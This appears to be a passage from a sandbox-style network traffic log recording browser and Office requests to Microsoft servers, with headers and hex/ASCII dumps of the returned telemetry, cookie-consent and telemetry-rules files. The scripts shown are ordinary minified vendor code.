                                                                                                                                                                                                x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                x-azure-ref: 20241123T155351Z-178bfbc474bfw4gbhC1NYCunf400000004q0000000009ch5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:53:51 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                2024-11-23 15:53:51 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                2024-11-23 15:53:51 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                2024-11-23 15:53:51 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                2024-11-23 15:53:51 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                2024-11-23 15:53:51 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                2024-11-23 15:53:52 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                2024-11-23 15:53:52 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                2024-11-23 15:53:52 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                2024-11-23 15:53:52 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                14192.168.2.44977413.107.246.634435824C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:51 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                Host: wcpstatic.microsoft.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-23 15:53:51 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:51 GMT
                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                Content-Length: 52717
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Age: 31697
                                                                                                                                                                                                Cache-Control: max-age=43200
                                                                                                                                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-azure-ref: 20241123T155351Z-178bfbc474bscnbchC1NYCe7eg00000004s000000000f8bf
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:53:51 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                2024-11-23 15:53:51 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                2024-11-23 15:53:52 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                2024-11-23 15:53:52 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                                Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                15192.168.2.44981213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:53:58 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:58 GMT
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                                                ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                                                x-ms-request-id: 91a9dc6d-001e-0028-4620-3dc49f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155358Z-174c587ffdfgcs66hC1TEB69cs00000002zg00000000dt2c
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:53:58 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
